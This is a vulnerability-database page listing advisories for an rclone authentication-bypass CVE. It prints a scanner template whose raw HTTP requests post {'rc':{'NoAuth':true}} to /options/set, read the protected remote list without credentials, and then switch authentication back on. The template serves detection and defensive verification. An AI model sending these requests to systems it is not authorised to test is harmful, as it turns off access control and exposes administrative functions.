| Reporter | Title | Published | Views | Family All 56 |
|---|---|---|---|---|
| CVE-2026-41176 | 22 Apr 202623:57 | – | attackerkb | |
| Amazon Linux 2023 : rclone (ALAS2023-2026-1658) | 20 May 202600:00 | – | nessus | |
| Amazon Linux 2 : rclone, --advisory ALAS2-2026-3285 (ALAS-2026-3285) | 14 May 202600:00 | – | nessus | |
| Fedora 44 : restic (2026-2290b9a9ad) | 20 Jun 202600:00 | – | nessus | |
| Fedora 43 : rclone (2026-2bb2aee489) | 10 May 202600:00 | – | nessus | |
| Fedora 44 : rclone (2026-63341da831) | 10 May 202600:00 | – | nessus | |
| Fedora 43 : restic (2026-e6094447f0) | 20 Jun 202600:00 | – | nessus | |
| openSUSE 16 Security Update : rclone (openSUSE-SU-2026:20620-1) | 25 Apr 202600:00 | – | nessus | |
| Rclone 1.45.x < 1.73.5 Authentication Bypass (CVE-2026-41176) | 24 Apr 202600:00 | – | nessus | |
| Ubuntu 20.04 LTS / 22.04 LTS / 24.04 LTS / 25.10 / 26.04 LTS : Rclone vulnerabilities (USN-8299-1) | 27 May 202600:00 | – | nessus |
id: CVE-2026-41176
info:
name: Rclone RC - Broken Access Control
author: theamanrawat
severity: critical
description: |
Rclone >= 1.45.0 and < 1.73.5 contains a broken access control vulnerability caused by unauthenticated access to the RC endpoint `options/set` allowing mutation of global runtime configuration, letting unauthenticated attackers access sensitive administrative functions, exploit requires RC server started without global HTTP authentication.
impact: |
Unauthenticated attackers can access sensitive administrative functions, potentially leading to full control over the RC server configuration and operations.
remediation: |
Upgrade to version 1.73.5 or later.
reference:
- https://github.com/rclone/rclone/security/advisories/GHSA-25qr-6mpr-f7qx
- https://nvd.nist.gov/vuln/detail/CVE-2026-41176
classification:
cvss-score: 9.2
cve-id: CVE-2026-41176
epss-score: 0.34734
epss-percentile: 0.98226
cwe-id: CWE-306
metadata:
verified: true
max-request: 4
vendor: rclone
product: rclone
tags: cve,cve2026,rclone,auth-bypass,rce,unauth,vkev
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /config/listremotes HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{}
matchers:
- type: dsl
dsl:
- 'status_code == 403'
- 'contains(content_type, "application/json")'
condition: and
internal: true
- raw:
- |
POST /options/set HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"rc":{"NoAuth":true}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "{}")'
- 'contains(content_type, "application/json")'
condition: and
internal: true
- raw:
- |
POST /config/listremotes HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{}
- |
POST /options/set HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"rc":{"NoAuth":false}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(body, "remotes")'
- 'contains(content_type, "application/json")'
condition: and
# digest: 4a0a00473045022005b3e859b85a740b9173f761a948cf9d3d6bec1f30264101e282ba1e34762973022100bfa5c2de4d6b72755a7536c56d8396b83ae670561dd67ea3386080a95e03e78c:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation